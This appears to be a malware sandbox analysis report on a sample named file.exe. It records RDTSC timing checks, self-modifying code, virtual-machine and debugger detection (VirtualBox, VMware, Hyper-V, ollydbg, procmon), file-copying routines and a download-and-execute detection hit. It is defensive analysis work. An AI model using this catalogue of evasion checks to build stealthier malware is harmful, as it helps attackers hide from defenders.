Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06210 second address: B06216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B078B3 second address: B078C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D543FFh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B168D4 second address: B168E5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD08B70876h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BE08 second address: B1BE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BE15 second address: B1BE4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007EFD08B70876h 0x0000000f pop ecx 0x00000010 jmp 00007EFD08B70882h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007EFD08B70882h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BE4C second address: B1BE51 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24270 second address: B2429C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70881h 0x00000007 jng 00007EFD08B70882h 0x0000000d jmp 00007EFD08B7087Ch 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2429C second address: B242A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B242A0 second address: B242AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007EFD08B7087Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2740A second address: B2740E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2740E second address: B27412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2AF09 second address: B2AF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFD08D543F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2AF15 second address: B2AF19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2AF19 second address: B2AF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F808 second address: B2F827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007EFD08B70884h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F827 second address: B2F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F836 second address: B2F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B7087Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F84B second address: B2F85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007EFD08D543F6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F85A second address: B2F86A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 je 00007EFD08B70876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F86A second address: B2F87A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007EFD08D543F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B360A7 second address: B360AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3621E second address: B36222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36222 second address: B3623E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007EFD08B7087Eh 0x0000000c ja 00007EFD08B70876h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jo 00007EFD08B7087Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3623E second address: B36254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007EFD08D543F8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007EFD08D543F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36254 second address: B3625E instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD08B70876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B363A2 second address: B363A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B363A6 second address: B363B2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD08B70876h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B363B2 second address: B363CF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFD08D543F8h 0x00000008 je 00007EFD08D543F8h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B363CF second address: B363D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B363D6 second address: B363EC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFD08D543FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007EFD08D543F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B363EC second address: B363F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3651A second address: B3651E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3651E second address: B36573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD08B70883h 0x0000000d push esi 0x0000000e jmp 00007EFD08B7087Dh 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 pushad 0x00000017 jmp 00007EFD08B7087Dh 0x0000001c jnl 00007EFD08B70876h 0x00000022 jmp 00007EFD08B7087Ah 0x00000027 popad 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jg 00007EFD08B70876h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36573 second address: B36581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007EFD08D543FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B36581 second address: B365A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007EFD08B70888h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3A287 second address: B3A29C instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007EFD08D5440Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3A29C second address: B3A2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70881h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3A2B1 second address: B3A2CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFD08D543FFh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B41481 second address: B41489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B41489 second address: B4148F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4148F second address: B4149C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4149C second address: B414A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B414A0 second address: B414C0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFD08B7087Eh 0x00000011 jne 00007EFD08B70876h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B42EA3 second address: B42EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007EFD08D543F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B42EAD second address: B42EB7 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD08B70876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B42EB7 second address: B42EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B42EC0 second address: B42ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B42ECD second address: B42ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B788 second address: B4B78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B78E second address: B4B7B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007EFD08D543F8h 0x00000010 jbe 00007EFD08D543FEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45A0D second address: B45A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45A11 second address: B45A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B45A15 second address: B45A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70885h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007EFD08B70878h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B58940 second address: B58952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007EFD08D543F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B686A3 second address: B686B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD08B70876h 0x0000000a jc 00007EFD08B70876h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B675E2 second address: B67600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD08D54408h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67600 second address: B67604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67604 second address: B67610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6778D second address: B6779C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007EFD092B0356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6790E second address: B6791E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007EFD08517BF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67A6E second address: B67A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B67A73 second address: B67A7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B1EB second address: B6B1F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B4DB second address: B6B4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B4E0 second address: B6B4E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30480 second address: 4D304B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08517C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007EFD08517C04h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D304B3 second address: 4D3052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007EFD092B0361h 0x0000000b sbb cl, FFFFFF86h 0x0000000e jmp 00007EFD092B0361h 0x00000013 popfd 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx ebx, cx 0x0000001a mov di, si 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov di, cx 0x00000023 mov edx, esi 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007EFD092B0364h 0x0000002f or ax, 6788h 0x00000034 jmp 00007EFD092B035Bh 0x00000039 popfd 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007EFD092B0360h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3056F second address: 4D30575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30575 second address: 4D30593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f movzx esi, di 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 3AD51108h 0x0000001d popad 0x0000001e rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe

Special instruction interceptor: First address: A7E1B3 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

graph_0-39051

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006040F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_006040F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005FE530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005F1710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006047C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_006047C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005FF7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00604B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00604B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00603B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00603B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005FDB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005FBE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005FEE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005FDF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F1160 GetSystemInfo,ExitProcess,

0_2_005F1160

Source: file.exe, file.exe, 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2189856639.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000002.2189856639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2189856639.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37863
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37885
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37866
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37878
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37918
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-37752

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F4610 VirtualProtect ?,00000004,00000100,00000000

0_2_005F4610

Source: C:\Users\user\Desktop\file.exe

0_2_00609BB0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00609AA0 mov eax, dword ptr fs:[00000030h]

0_2_00609AA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00607690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00607690

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

